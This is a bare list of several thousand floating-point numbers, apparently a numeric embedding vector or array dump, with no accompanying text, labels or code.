-0.035287044942379, 0.04471173137426376, 0.019531631842255592, -0.021197613328695297, 0.016532868146896362, 0.00251086987555027, -0.005791264120489359, 0.021911604329943657, 0.03404945880174637, -0.053692158311605453, -0.019785495474934578, 0.0229270588606596, 0.04848795384168625, -0.013986298814415932, -0.0051645380444824696, 0.0012931178789585829, 0.005398568697273731, 0.00642988970503211, -0.010638472624123096, 0.03030497021973133, -0.025687824934720993, 0.03300227224826813, -0.051121786236763, 0.011265198700129986, -0.0007477077306248248, 0.014494026079773903, 0.004121317528188229, 0.00560086639598012, -0.008448898792266846, 0.036905426532030106, -0.017913252115249634, -0.03468411788344383, -0.04975727200508118, -0.019277768209576607, 0.03143148869276047, -0.006687719840556383, -0.015287349931895733, -0.05058232694864273, 0.01689779758453369, -0.03677849471569061, 0.005160571541637182, -0.029717911034822464, 0.04271255433559418, 0.040110453963279724, -0.0030047139152884483, -0.02892458625137806, -0.03014630638062954, 0.00475994311273098, -0.003076113061979413, -0.026861945167183876, 0.010654338635504246, -0.04496559500694275, 0.035001449286937714, -0.005029673222452402, -0.019071504473686218, 0.017754588276147842, -0.012645581737160683, 0.02978137694299221, -0.009075624868273735, -0.03960272669792175, 0.002500953385606408, -0.0022927059326320887, 0.00639419024810195, -0.0006713502807542682, -0.01778632029891014, 0.05610386282205582, 0.03506491333246231, -0.04953514039516449, -0.005961828399449587, 0.004942407365888357, -0.00511693861335516, -0.025989288464188576, 0.008226768113672733, 0.022673195227980614, -0.00391901982948184, 0.00961508508771658, 0.03119349293410778, -0.04264909029006958, -0.002465253695845604, 0.006897950544953346, 0.03842860460281372, -0.01938883401453495, 0.011146199889481068, -0.005073305685073137, -0.0167708657681942, -0.0031435457058250904, -0.013930766843259335, 0.019785495474934578, 0.008734495379030704, -0.017675254493951797, 0.006172059569507837, 0.00960715115070343, 0.01888110674917698, -0.016643933951854706, -0.023498252034187317, 0.0281788632273674, 0.011868124827742577, -0.01348650548607111, -0.019706163555383682, -0.019531631842255592, -0.03190748393535614, -0.011788791976869106, -0.001404183218255639, -0.001815719879232347, -0.021419743075966835, 0.020404288545250893, 0.004307748284190893, 0.0009807465830817819, -0.049281276762485504, -0.01401009876281023, -0.02135627716779709, 0.01689779758453369, 0.016326604411005974, -0.0030880130361765623, -0.0013169175945222378, 0.018389247357845306, 0.02663981355726719, -0.0004060826322529465, 0.029543379321694374, -0.021721206605434418, -0.010130745358765125, 0.02184813842177391, -0.008774161338806152, -0.01729445904493332, -0.002637801691889763, 0.006925716996192932, 0.012748713605105877, -0.04810715839266777, 0.01616000570356846, -0.0004358322767075151, 0.018119515851140022, -0.01153492834419012, 0.011947456747293472, -0.022276533767580986, 0.00581506360322237, -0.012732847593724728, -0.013700702227652073, -0.0024156710132956505, -0.006913817021995783, -0.036239031702280045, -0.0035025246907025576, -0.03677849471569061, -0.006905884016305208, -0.012018855661153793, -0.008901093155145645, 0.07279539853334427, -0.04639357700943947, -0.012621781788766384, -0.013851433992385864, -0.015771277248859406, -0.029876574873924255, 0.014954154379665852, 0.012478983961045742, -0.04261735454201698, 0.008488564752042294, -0.04242695868015289, 0.02714754082262516, -0.038492072373628616, 0.009916547685861588, -0.010329076088964939, -0.01639007031917572, 0.0057317647151649, 0.035191845148801804, -0.06651227176189423, 0.004621111322194338, -0.0010977619094774127, -0.008512364700436592, 0.00806413684040308, -0.03947579488158226, 0.02681434527039528, -0.03893633186817169, -0.02854379080235958, -0.006802751682698727, -0.004065784625709057, 0.00008150162466336042, -0.03274840861558914, 0.01170946005731821, 0.015517414547502995, -0.014938287436962128, -0.017151661217212677, 0.029003920033574104, 0.02078508399426937, -0.019690297544002533, -0.010749537497758865, -0.0008409232832491398, 0.0011731276754289865, 0.044013604521751404, 0.02256212942302227, 0.008258501067757607, 0.017151661217212677, -0.03119349293410778, -0.022879458963871002, -0.013026377186179161, 0.005866629537194967, -0.019848961383104324, -0.006104626692831516, -0.020340822637081146, -0.022244799882173538, 0.017833920195698738, 0.022498663514852524, -0.014144963584840298, -0.00798480398952961, 0.0005850763409398496, -0.010384608991444111, -0.004212549421936274, -0.040459513664245605, 0.05594519525766373, -0.024577172473073006, 0.026338351890444756, -0.010011746548116207, -0.015485681593418121, 0.02962271124124527, 0.0083616329357028, -0.03811127692461014, 0.010924069210886955, -0.030622299760580063, 0.03503318130970001, 0.06905090808868408, -0.031145893037319183, 0.01579507812857628, 0.004732176661491394, -0.033763863146305084, 0.04740903154015541, -0.02149907499551773, -0.008139502257108688, -0.03947579488158226, 0.04261735454201698, -0.03931712731719017, -0.07247806340456009, 0.0001369723177049309, 0.03401772677898407, -0.03560437262058258, -0.010019679553806782, 0.0047163101844489574, -0.0581347718834877, 0.0404912494122982, -0.009488153271377087, 0.042236559092998505, -0.00987688172608614, -0.009464353322982788, 0.05451721325516701, 0.01579507812857628, -0.0071478476747870445, 0.03300227224826813, 0.00994828063994646, 0.035128381103277206, -0.0070685152895748615, -0.015398415736854076, 0.0008424107218161225, 0.04966207221150398, 0.024101177230477333, 0.012042655609548092, 0.0145416259765625, -0.013549971394240856, 0.036905426532030106, -0.017230993136763573, 0.007842006161808968, -0.003365676384419203, 0.01903977245092392, 0.018246447667479515, 0.01726272702217102, -0.006398156750947237, 0.012494849972426891, -0.0291149839758873, -0.02592582255601883, -0.00642988970503211, 0.0019307518377900124, 0.00475994311273098, 0.016977129504084587, -0.003700855653733015, -0.026576347649097443, -0.021261079236865044, -0.06007048115134239, -0.01748485676944256, 0.0007591117173433304, -0.035191845148801804, 0.055278804153203964, -0.014747889712452888, -0.006866217590868473, 0.027211006730794907, -0.03205028176307678, -0.031145893037319183, -0.03953925892710686, -0.0024712036829441786, -0.01938883401453495, -0.015089019201695919, 0.016342470422387123, 0.02134041115641594, -0.005890429485589266, 0.011606327258050442, -0.012732847593724728, -0.023767981678247452, -0.007957038469612598, 0.05194684490561485, 0.011677727103233337, 0.0058190301060676575, 0.0083854328840971, 0.012637648731470108, -0.005370802246034145, 0.03192334994673729, -0.002590202260762453, -0.003429142292588949, -0.03255800902843475, 0.005842830054461956, -0.015049353241920471, -0.002879765583202243, -0.0015330982860177755, 0.004692510701715946, 0.004137184005230665, -0.0014448410365730524, 0.02272079512476921, -0.010503607802093029, -0.03120935894548893, 0.011669793166220188, -0.06943169981241226, -0.009765815921127796, -0.024386774748563766, -0.02397424541413784, 0.00978168286383152, 0.0016035058069974184, 0.006957449950277805, -0.016485270112752914, 0.017849786207079887, -0.018722442910075188, 0.011582528240978718, 0.015517414547502995, -0.014851022511720657, -0.006378323771059513, -0.029860708862543106, 0.01023387722671032, 0.008111735805869102, -0.01708819530904293, 0.00020961102563887835, 0.029495779424905777, 0.023371320217847824, 0.022102002054452896, -0.03143148869276047, 0.02870245650410652, 0.005521534010767937, 0.016612201929092407, -0.030066972598433495, -0.019087372347712517, 0.01781805418431759, -0.00749691016972065, -0.04817062243819237, -0.018278181552886963, -0.019103238359093666, 0.003203044878318906, -0.029924174770712852, -0.02435504086315632, -0.029035652056336403, 0.005541366990655661, 0.0054898010566830635, 0.020372556522488594, 0.014914488419890404, 0.004065784625709057, -0.01331197377294302, -0.01259798277169466, -0.0021776738576591015, 0.009337421506643295, 0.009218422695994377, 0.02768700197339058, -0.003355759894475341, 0.020721618086099625, -0.0004546737181954086, 0.000989175634458661, 0.012796313501894474, 0.0061958590522408485, 0.030622299760580063, -0.005787297151982784, -0.011154132895171642, 0.00280043319799006, 0.020832683891057968, -0.005763497669249773, 0.005922162439674139, -0.022863592952489853, 0.04474346339702606, -0.0246565043926239, 0.018992172554135323, -0.035128381103277206, 0.02168947272002697, 0.012415518052875996, 0.026354217901825905, -0.007611942011862993, -0.008234701119363308, 0.028162995353341103, 0.002193540334701538, 0.02324438840150833, 0.021276945248246193, 0.01994416117668152, 0.020134558901190758, 0.003349809907376766, 0.013343706727027893, 0.01516041811555624, 0.03496971353888512, -0.0127645805478096, 0.0039884354919195175, 0.011741193011403084, -0.0013595586642622948, -0.02257799543440342, -0.0026814346201717854, 0.010003813542425632, 0.020721618086099625, -0.028956320136785507, 0.0004861587658524513, 0.013946632854640484, -0.0039884354919195175, 0.02134041115641594, -0.009170823730528355, 0.002873815596103668, 0.03190748393535614, -0.0023026224225759506, 0.005949928890913725, -0.014660624787211418, -0.028131263330578804, 0.027575936168432236, -0.01870657689869404, -0.014097364619374275, 0.017056463286280632, 0.01745312474668026, -0.01559674646705389, -0.0032268445938825607, 0.0025366528425365686, -0.004950340837240219, -0.02697301097214222, 0.0001356087886961177, 0.01761178858578205, -0.008932826109230518, -0.014533692970871925, 0.002469220431521535, -0.02484690211713314, 0.013637236319482327, -0.021578408777713776, 0.013732435181736946, -0.0036532562226057053, 0.00414511701092124, 0.037793949246406555, -0.004958273842930794, -0.02222893387079239, -0.032875340431928635, 0.015017620287835598, -0.00016126786067616194, 0.009456420317292213, -0.02327612042427063, 0.03646116331219673, -0.0049543073400855064, 0.02078508399426937, 0.056833717972040176, -0.005335102789103985, 0.03477931767702103, -0.0012098188744857907, 0.036746758967638016, 0.021467342972755432, -0.014724090695381165, 0.013161242008209229, 0.01835751347243786, -0.03560437262058258, 0.02078508399426937, -0.020229756832122803, 0.01347857154905796, 0.007116114720702171, 0.0012484933249652386, -0.022514529526233673, 0.0015241734217852354, -0.03785741329193115, -0.018770042806863785, 0.024799302220344543, 0.00286588235758245, -0.015406348742544651, -0.020927881821990013, 0.013629303313791752, 0.04848795384168625, -0.016675667837262154, -0.00827436801046133, -0.0034033593256026506, 0.009821348823606968, 0.0005632599350064993, -0.0003681518428493291, 0.011281064711511135, -0.015215951018035412, 0.0020923917181789875, -0.004740110132843256, 0.001881169155240059, 0.034811049699783325, 0.024751704186201096, -0.02873418852686882, 0.0015479731373488903, -0.017548322677612305, 0.014549558982253075, 0.011225531809031963, -0.022466931492090225, 0.05705584958195686, 0.06663919985294342, -0.0025604525581002235, -0.015533280558884144, -0.018103649839758873, -0.0388094000518322, -0.01533494982868433, 0.01602514088153839, 0.015557080507278442, -0.015017620287835598, -0.02452957257628441, -0.00255846930667758, 0.024275708943605423, 0.026370083913207054, -0.004910674411803484, -0.02660808153450489, 0.027401404455304146, 0.02061055228114128, -0.013240574859082699, -0.015771277248859406, 0.03319266811013222, 0.019261902198195457, -0.019801363348960876, -0.0036334232427179813, -0.004680610727518797, -0.015699878334999084, -0.016485270112752914, 0.007945138029754162, -0.008996292017400265, 0.017373792827129364, 0.019420567899942398, -0.008044303394854069, -0.013502371497452259, -0.021959204226732254, 0.033922526985406876, -0.0008414190961048007, 0.04252215847373009, 0.009853081777691841, 0.0070090158842504025, -0.012978778220713139, 0.010019679553806782, -0.008131569251418114, 0.0005349977873265743, -0.0028916653245687485, -0.027211006730794907, 0.009678550995886326, -0.0037504383362829685, -0.0049463738687336445, 0.00925015565007925, 0.018040183931589127, -0.00872656237334013, -0.008409232832491398, 0.009123223833739758, -0.00827436801046133, 0.0017958867829293013, 0.01618380658328533, -0.03160602226853371, 0.01569194532930851, 0.020737484097480774, -0.03382732719182968, 0.02008695900440216, -0.017310326918959618, -0.020848549902439117, -0.011257264763116837, 0.006961416453123093, -0.019674431532621384, -0.016437670215964317, -0.0317646861076355, 0.02221306785941124, -0.009543686173856258, -0.016310738399624825, 0.0038119209930300713, 0.02007109299302101, 0.0031435457058250904, -0.005755564197897911, -0.031082427129149437, 0.007199413608759642, 0.017881520092487335, -0.050518862903118134, 0.011352463625371456, 0.010321143083274364, -0.026132086291909218, 0.0011592444498091936, 0.03316093608736992, 0.016675667837262154, -0.009416754357516766, 0.02026149071753025, -0.011479395441710949, -0.0014408744173124433, -0.021007215604186058, 0.0029828976839780807, 0.014779622666537762, -0.028099529445171356, 0.014954154379665852, -0.013518238440155983, 0.013970432803034782, -0.0059776948764920235, -0.055627867579460144, -0.011090666987001896, -0.002729034051299095, 0.01525561697781086, -0.002703250851482153, 0.0059578618966042995, 0.011423863470554352, 0.009297755546867847, 0.0023779883049428463, -0.00017924160056281835, 0.008750362321734428, 0.00354615761898458, -0.02875005640089512, 0.023736249655485153, -0.01796085201203823, 0.02329198829829693, -0.013399239629507065, 0.009202556684613228, -0.006719452794641256, -0.033573463559150696, -0.008686896413564682, 0.017199261114001274, -0.02080095000565052, -0.018389247357845306, 0.015818877145648003, 0.017675254493951797, -0.0037226721178740263, -0.023403052240610123, 0.032843608409166336, -0.032875340431928635, 0.00484324200078845, 0.0029333147685974836, -0.011320730671286583, -0.0030086806509643793, 0.0011037117801606655, 0.011035134084522724, -0.0018583610653877258, 0.002175690606236458, -0.010083145461976528, 0.04477519541978836, -0.012455184012651443, 0.006890017539262772, -0.02838512696325779, 0.0185003113001585, -0.0027429170440882444, -0.027417272329330444, -0.010678138583898544, 0.030051106587052345, 0.015271483920514584, -0.03408119082450867, -0.002570369280874729, -0.021038947626948357, -0.028162995353341103, 0.0018583610653877258, 0.012820113450288773, -0.01514455210417509, 0.009583352133631706, -0.03149495646357536, -0.009646818041801453, 0.020769217982888222, -0.010106945410370827, 0.012153721414506435, -0.006933650467544794, 0.010503607802093029, -0.005414435174316168, 0.0014240163145586848, 0.020055226981639862, -0.009900681674480438, 0.0050852056592702866, -0.014819289557635784, -0.040840309113264084, 0.023403052240610123, -0.007691274397075176, 0.011320730671286583, 0.016517002135515213, 0.011566661298274994, 0.009591285139322281, -0.007945138029754162, -0.002945214742794633, 0.002076525241136551, 0.03136802464723587, 0.002465253695845604, 0.029749643057584763, -0.0083854328840971, 0.014930354431271553, -0.01711992919445038, 0.045378122478723526, -0.022324131801724434, -0.00026625930331647396, -0.021245211362838745, -0.0059657953679561615, -0.0030285136308521032, -0.01905563846230507, -0.004059834871441126, -0.000718949711881578, 0.009710283949971199, -0.022593863308429718, 0.02203853614628315, 0.015223884023725986, -0.006049094256013632, 0.013224707916378975, -0.017564190551638603, -0.01976962946355343, -0.0017066379077732563, -0.03100309520959854, 0.025640226900577545, -0.013899033889174461, 0.01635833829641342, -0.001992234494537115, -0.017008863389492035, 0.0005305352970026433, 0.0063624572940170765, 0.009884814731776714, -0.009416754357516766, -0.05727798119187355, -0.004803575575351715, -0.012145787477493286, 0.0019862845074385405, -0.030035240575671196, 0.018436845391988754, -0.011336597613990307, -0.024640638381242752, -0.017849786207079887, -0.00046558192116208375, 0.022165467962622643, 0.008409232832491398, 0.03792088106274605, -0.0008463773410767317, 0.03290707245469093, -0.006318824365735054, 0.009234289638698101, -0.0019981844816356897, -0.03811127692461014, 0.0021102414466440678, -0.029130851849913597, -0.032526277005672455, -0.00009321555262431502, 0.019499899819493294, 0.010805070400238037, -0.04788502678275108, -0.027813933789730072, 0.03133629262447357, 0.02310159057378769, -0.0015192151768133044, -0.02716340869665146, -0.002649701666086912, -0.03033670410513878, -0.007231146562844515, -0.006302957888692617, -0.008956626057624817, 0.001979342894628644, -0.0015767310978844762, -0.004510045982897282, 0.03865073621273041, 0.012637648731470108, -0.020658152177929878, 0.007457244209945202, 0.020547086372971535, -0.0009862006409093738, -0.00767540792003274, -0.037984345108270645, -0.022815993055701256, -0.0055810329504311085, -0.02840099297463894, 0.003784154774621129, -0.0052716368809342384, 0.03617556765675545, -0.022292399778962135, -0.0010680122068151832, 0.01269318163394928, 0.04525119066238403, 0.005715898238122463, -0.04103070870041847, -0.023529984056949615, -0.0004199657996650785, -0.005081239156424999, 0.00629899138584733, 0.0007293620728887618, -0.009678550995886326, -0.003193128388375044, -0.005362869240343571, -0.007536576595157385, -0.012344119139015675, -0.022879458963871002, 0.00007573763286927715, -0.0010005796793848276, -0.017421390861272812, -0.005196270998567343, -0.021641874685883522, 0.013605503365397453, -0.00789753906428814, -0.007734907325357199, 0.017310326918959618, 0.008024470880627632, -0.004545745439827442, -0.011772925965487957, 0.007350145373493433, -0.012185454368591309, -0.03560437262058258, -0.013565837405622005, -0.054390281438827515, -0.017548322677612305, 0.028623124584555626, -0.0247041042894125, -0.028781788423657417, -0.011764992028474808, 0.014716156758368015, 0.011780858971178532, 0.02149907499551773, -0.023165056481957436, -0.03135215863585472, 0.025291163474321365, 0.020198024809360504, -0.031812284141778946, 0.02521183155477047, -0.00855996459722519, -0.006291057914495468, -0.006072893738746643, -0.009464353322982788, 0.000079332385212183, 0.05499320849776268, -0.01242345105856657, 0.021800538524985313, -0.016421804204583168, -0.031621888279914856, -0.0127645805478096, -0.00961508508771658, -0.008885227143764496, 0.011598394252359867, 0.0475994311273098, -0.018579645082354546, -0.005930095445364714, -0.02646528370678425, 0.001955543179064989, 0.03051123395562172, -0.006156193092465401, -0.006961416453123093, 0.013534104451537132, -0.0010481791105121374, 0.020594686269760132, -0.03741315379738808, 0.00545806810259819, -0.010106945410370827, -0.022625595331192017, -0.03105069510638714, -0.029003920033574104, -0.02681434527039528, -0.04299814999103546, -0.01619967259466648, -0.00073283287929371, 0.006199825555086136, -0.009305688552558422, -0.012804246507585049, 0.016866065561771393, -0.0029035652987658978, -0.01959509775042534, 0.003262544283643365, -0.016643933951854706, 0.008710695430636406, 0.006517155095934868, -0.002679451135918498, 0.010773337446153164, 0.0034707917366176844, 0.001577722723595798, -0.007683341391384602, 0.04033258184790611, 0.05848383158445358, -0.02678261324763298, 0.0053232028149068356, 0.003439058782532811, -0.010868536308407784, 0.01675499975681305, 0.03232001140713692, -0.0014289745595306158, -0.004839275497943163, -0.0004826879594475031, 0.022863592952489853, 0.021451476961374283, 0.013589637354016304, 0.0069971163757145405, 0.0024771536700427532, -0.008187102153897285, -0.02414877712726593, 0.02624315209686756, -0.020896149799227715, -0.021594274789094925, 0.011344530619680882, 0.01525561697781086, -0.0032189113553613424, -0.04252215847373009, -0.008496498689055443, 0.0026635846588760614, 0.016152072697877884, 0.0001121189707191661, -0.006659953389316797, 0.006707552820444107, -0.015699878334999084, 0.01093200221657753, -0.001577722723595798, 0.04867834970355034, -0.018119515851140022, 0.01444642711430788, 0.0019585182890295982, 0.015319082885980606, -0.006267258431762457, 0.0058785295113921165, -0.012732847593724728, -0.016675667837262154, -0.027004742994904518, 0.034112926572561264, -0.050518862903118134, 0.0016173889162018895, -0.0167708657681942, 0.0030820630490779877, 0.022641461342573166, 0.0042998152785003185, 0.01694539748132229, 0.003762338310480118, 0.011400063522160053, -0.011757059022784233, -0.028956320136785507, 0.009678550995886326, -0.014573358930647373, 0.006152226123958826, -0.014057698659598827, -0.0011810609139502048, -0.01347857154905796, -0.020182158797979355, -0.009646818041801453, -0.025354629382491112, 0.008095869794487953, -0.033034004271030426, 0.003970585763454437, 0.011661860160529613, -0.018373379483819008, 0.009987946599721909, 0.014097364619374275, -0.01418463047593832, -0.008599630557000637, 0.002731017302721739, -0.011328664608299732, -0.0255291610956192, 0.015485681593418121, 0.02130867727100849, 0.09221596270799637, -0.014501960016787052, -0.00007158508378779516, -0.017024729400873184, -0.015517414547502995, 0.013137442991137505, -0.0029848809354007244, 0.017326192930340767, 0.013859366998076439, 0.0022332065273076296, 0.012217187322676182, -0.010844736360013485, -0.0009812423959374428, 0.011249331757426262, 0.027084074914455414, 0.018801774829626083, -0.00749691016972065, -0.010559139773249626, 0.014224296435713768, -0.02979724295437336, 0.00960715115070343, 0.0077111078426241875, 0.009773749858140945, -0.01612827368080616, 0.015485681593418121, -0.010027613490819931, -0.003111812751740217, -0.010884403251111507, -0.03861900418996811, -0.00915495678782463, 0.005557233467698097, -0.014874821528792381, -0.016834331676363945, 0.000569209863897413, 0.012820113450288773, 0.005442201625555754, 0.015327016822993755, -0.009099424816668034, -0.01153492834419012, -0.003193128388375044, -0.00789753906428814, -0.028067797422409058, -0.010789204388856888, -0.005462034605443478, -0.012415518052875996, -0.01602514088153839, 0.03335133567452431, 0.006890017539262772, -0.003149495692923665, -0.00836956687271595, 0.007278745993971825, -0.027369672432541847, 0.018896974623203278, 0.03363693132996559, -0.0029333147685974836, 0.026766745373606682, -0.0028678656090050936, -0.019277768209576607, -0.004633011296391487, -0.0004918607883155346, 0.0010511541040614247, 0.016992997378110886, -0.011669793166220188, 0.020404288545250893, -0.016326604411005974, -0.018008451908826828, -0.03011457249522209, 0.0007759698783047497, -0.00020081010006833822, 0.014208429493010044, 0.004490213003009558, -0.010694005526602268, 0.03503318130970001, 0.0022470897529274225, 0.022324131801724434, 0.01436709426343441, 0.003363693132996559, 0.02341892011463642, -0.04001525416970253, 0.00182960310485214, 0.02365691587328911, 0.03051123395562172, 0.002683417871594429, 0.004331548232585192, -0.009432620368897915, 0.02433917485177517, -0.0052438704296946526, 0.008805894292891026, -0.003587807063013315, -0.0020904082339257, -0.0015420231502503157, 0.002796466462314129, -0.009226356633007526, 0.012272719293832779, 0.015906142070889473, 0.029352981597185135, 0.005045539699494839, -0.01886524073779583, -0.020309090614318848, -0.013502371497452259, -0.001614414039067924, 0.00731841241940856, 0.024989699944853783, -0.009408820420503616, -0.01314537599682808, 0.017516590654850006, -0.022244799882173538, 0.028829388320446014, -0.0002441949909552932, -0.00003349933831486851, -0.04147496819496155, -0.03414465859532356, 0.015438081696629524, -0.010781270451843739, -0.004942407365888357, 0.0025882190093398094, 0.005747631192207336, 0.015176285058259964, -0.013899033889174461, -0.011582528240978718, -0.014739956706762314, 0.0010838786838576198, 0.050169799476861954, -0.013700702227652073, -0.0014854988548904657, 0.004700443707406521, -0.010471874848008156, -0.01762765645980835, 0.048011958599090576, 0.022086136043071747, 0.018547911196947098, 0.007342211902141571, 0.005128838587552309, -0.02048362046480179, 0.042204827070236206, -0.012582115828990936, 0.035128381103277206, 0.007877705618739128, 0.0127645805478096, 0.010257677175104618, -0.029051518067717552, 0.022673195227980614, 0.006342623848468065, -0.010582939721643925, 0.018008451908826828, 0.000802744529210031, 0.016977129504084587, 0.009456420317292213, 0.019960027188062668, 0.018405113369226456, -0.008218835107982159, -0.03731795400381088, 0.005378735717386007, 0.039920054376125336, 0.007592109031975269, -0.004184783436357975, 0.02341892011463642, -0.022625595331192017, -0.009131157770752907, 0.007163714151829481, 0.010551206767559052, 0.009321555495262146, 0.017199261114001274, -0.0015479731373488903, -0.023894913494586945, 0.0255608931183815, -0.008488564752042294, -0.034652385860681534, -0.021626006811857224, -0.027258606627583504, 0.016279004514217377, 0.015319082885980606, -0.01761178858578205, 0.0026893678586930037, 0.01566021330654621, 0.0028956320602446795, -0.012494849972426891, 0.00520023750141263, 0.023720381781458855, -0.012010922655463219, 0.0022332065273076296, 0.026893677189946175, -0.015469814650714397, -0.023894913494586945, 0.020388422533869743, -0.03205028176307678, -0.003589790314435959, 0.011249331757426262, -0.03389079496264458, 0.013740369118750095, 0.010598806664347649, 0.018785908818244934, -0.012367918156087399, 0.007417577784508467, -0.009400887414813042, -0.0024017877876758575, -0.0036968891508877277, -0.01727859303355217, -0.00020688398217316717, -0.0023581550922244787, -0.0039229863323271275, 0.0021776738576591015, -0.02976551093161106, -0.006961416453123093, 0.0066123539581894875, -0.024942101910710335, -0.0028777820989489555, 0.01883350871503353, -0.01830991357564926, -0.01401009876281023, -0.011741193011403084, 0.011717393063008785, 0.022102002054452896, 0.021229345351457596, 0.02395837940275669, 0.02732207253575325, -0.009908614680171013, -0.0334465317428112, -0.018817640841007233, 0.001357575412839651, -0.01488275546580553, 0.010099012404680252, 0.007080415263772011, 0.0014309578109532595, -0.01109859999269247, -0.0034231923054903746, 0.02770286798477173, -0.017833920195698738, -0.010011746548116207, 0.011296931654214859, -0.022339999675750732, -0.0050931391306221485, -0.0006569713004864752, 0.018024317920207977, -0.004149083513766527, -0.030987229198217392, 0.015684012323617935, -0.003552107373252511, 0.014398827217519283, -0.0033299766946583986, 0.028115397319197655, -0.020531220361590385, -0.03563610836863518, 0.005934062413871288, -0.004633011296391487, -0.00022275045921560377, 0.009202556684613228, 0.022133734077215195, -0.00802843738347292, 0.0335099995136261, -0.01959509775042534, 0.008072069846093655, -0.0005959845148026943, -0.006616320926696062, -0.01726272702217102, 0.039412327110767365, 0.0073858448304235935, -0.01884937472641468, 0.014176696538925171, 0.004030085168778896, 0.008056203834712505, -0.0028222494293004274, -0.009266022592782974, 0.004057851620018482, -0.00647748913615942, 0.02540222927927971, -0.0021340411622077227, -0.005842830054461956, 0.0004415342991705984, -0.02135627716779709, 0.0202456247061491, 0.0010620623361319304, 0.02416464313864708, -0.009908614680171013, 0.018230581656098366, -0.014232229441404343, 0.00497414031997323, -0.022165467962622643, -0.003770271549001336, -0.0027052343357354403, -0.008686896413564682, 0.06022914499044418, 0.013542037457227707, -0.02029322274029255, 0.01724686101078987, -0.016977129504084587, -0.02800433151423931, -0.009337421506643295, -0.016675667837262154, -0.01444642711430788, -0.013565837405622005, 0.018912840634584427, 0.004024134948849678, -0.03506491333246231, 0.017913252115249634, 0.006239491980522871, -0.022482797503471375, 0.02978137694299221, -0.022419331595301628, 0.008425098843872547, 0.01956336572766304, 0.01488275546580553, 0.0020983414724469185, 0.021610140800476074, -0.0009703342220745981, 0.0034192258026450872, -0.01905563846230507, -0.010820937342941761, 0.0013972416054457426, -0.010947869159281254, 0.019960027188062668, -0.009765815921127796, -0.027385538443922997, -0.035191845148801804, 0.0006693669711239636, 0.0012137854937463999, 0.0038119209930300713, -0.007925305515527725, -0.008048269897699356, 0.0058190301060676575, 0.02679847925901413, 0.013645170256495476, -0.022641461342573166, -0.01972202956676483, -0.017659388482570648, -0.0028400993905961514, -0.0007546492852270603, -0.0028698488604277372, 0.008567897602915764, -0.031161760911345482, 0.02800433151423931, 0.015120752155780792, 0.02484690211713314, -0.0038991866167634726, -0.010614672675728798, -0.004026118665933609, -0.004525912459939718, 0.016517002135515213, -0.0006108593661338091, -0.00398446898907423, -0.03398599475622177, 0.03051123395562172, -0.006219659000635147, -0.003145528957247734, 0.030352570116519928, -0.006687719840556383, 0.00855203066021204, -0.007818206213414669, -0.0022887391969561577, -0.017135795205831528, -0.03588997200131416, -0.009139090776443481, -0.0011324697406962514, -0.014509893022477627, 0.0059776948764920235, 0.0020100842230021954, 0.0073263454250991344, 0.018785908818244934, 0.0062037925235927105, -0.02116587944328785, -0.007369978353381157, -0.001133461482822895, -0.010813003405928612, -0.003490624949336052, -0.0026873843744397163, 0.0033240269403904676, -0.006588554475456476, 0.01004347950220108, -0.00030220678308978677, -0.018024317920207977, 0.00189505226444453, -0.004482279531657696, -0.00898835901170969, -0.006497322116047144, -0.0073144459165632725, -0.0047163101844489574, 0.011019268073141575, -0.013716569170355797, -0.014216363430023193, 0.02276839315891266, 0.002721100812777877, 0.003655239474028349, -0.010987535119056702, 0.010344943031668663, -0.03370039537549019, 0.02399011328816414, -0.013534104451537132, 0.01391489990055561, -0.008032403886318207, 0.0114635294303298, -0.008218835107982159, 0.038016077131032944, 0.013502371497452259, 0.03184401988983154, 0.02148320898413658, 0.006152226123958826, 0.025354629382491112, -0.0012960927560925484, -0.02452957257628441, -0.01777045428752899, 0.012582115828990936, -0.008599630557000637, -0.020150424912571907, 0.01835751347243786, 0.008797961287200451, -0.00011379239003872499, -0.004529878962785006, -0.015826810151338577, 0.04702823609113693, -0.0211500134319067, 0.01853204518556595, -0.0073937783017754555, 0.03741315379738808, -0.018817640841007233, 0.006144293118268251, 0.000933642964810133, -0.01437502820044756, 0.01384350098669529, -0.027972597628831863, 0.011677727103233337, 0.001026362762786448, -0.006112560164183378, -0.029860708862543106, -0.030638165771961212, 0.013795901089906693, -0.0011582528240978718, 0.013470638543367386, -0.00558896642178297, 0.018087783828377724, 0.009392954409122467, -0.004752009641379118, 0.02487863600254059, 0.014327428303658962, -0.013335773721337318, 0.03858727216720581, 0.004157016985118389, -0.0202773567289114, -0.0030066973995417356, -0.012312386184930801, -0.004188749939203262, -0.001217752113007009, -0.0012008938938379288, -0.018738308921456337, -0.0008498481474816799, 0.00987688172608614, -0.020039359107613564, -0.003994385711848736, 0.0036611894611269236, -0.011130332946777344, 0.005267670378088951, 0.0005949928890913725, 0.0047758095897734165, 0.012034722603857517, 0.02659221552312374, 0.011130332946777344, 0.011915723793208599, 0.014327428303658962, 0.0051724715158343315, -0.014549558982253075, 0.012391718104481697, -0.0010729704517871141, -0.017532456666231155, 0.015215951018035412, 0.004656810779124498, -0.0023264221381396055, 0.022847726941108704, -0.01533494982868433, -0.008909027092158794, 0.0010729704517871141, -0.009630951099097729, 0.025798890739679337, 0.003193128388375044, -0.00023960859107319266, -0.005680198781192303, 0.01391489990055561, -0.006663920357823372, -0.00037311011692509055, -0.009924480691552162, -0.0022808059584349394, 0.0005161563167348504, 0.015247683972120285, -0.013375439681112766, -0.001936701824888587, 0.012002989649772644, -0.00498604029417038, 0.023323720321059227, 0.0013357589486986399, 0.011344530619680882, 0.013502371497452259, 0.0053232028149068356, 0.017230993136763573, 0.021626006811857224, -0.0194047000259161, 0.015549147501587868, 0.022482797503471375, 0.012772513553500175, 0.021451476961374283, 0.003845637198537588, 0.018230581656098366, -0.004018185194581747, -0.0017810120480135083, -0.012129921466112137, 0.017659388482570648, 0.0031772619113326073, 0.009623018093407154, -0.01656460203230381, -0.017659388482570648, -0.0025088866241276264, 0.01656460203230381, -0.01127313170582056, 0.0005444184644147754, 0.006854318082332611, -0.002715150825679302, 0.01640593633055687, 0.007457244209945202, 0.012835979461669922, -0.007667474914342165, 0.010662272572517395, -0.021419743075966835, -0.004355347715318203, 0.0010214044013991952, 0.0022232900373637676, -0.002346255350857973, -0.021229345351457596, -0.01761178858578205, 0.018262315541505814, 0.02641768380999565, 0.0053430357947945595, -0.011169999837875366, -0.00046657357597723603, 0.008337833918631077, -0.0037960545159876347, -0.0034053425770252943, -0.008901093155145645, 0.0047678761184215546, 0.004565578885376453, 0.023180922493338585, -0.00520023750141263, 0.0034370755311101675, -0.006878117565065622, 0.0042403158731758595, 0.0019952093716710806, -0.001722504384815693, 0.0068344846367836, 0.006207759026437998, 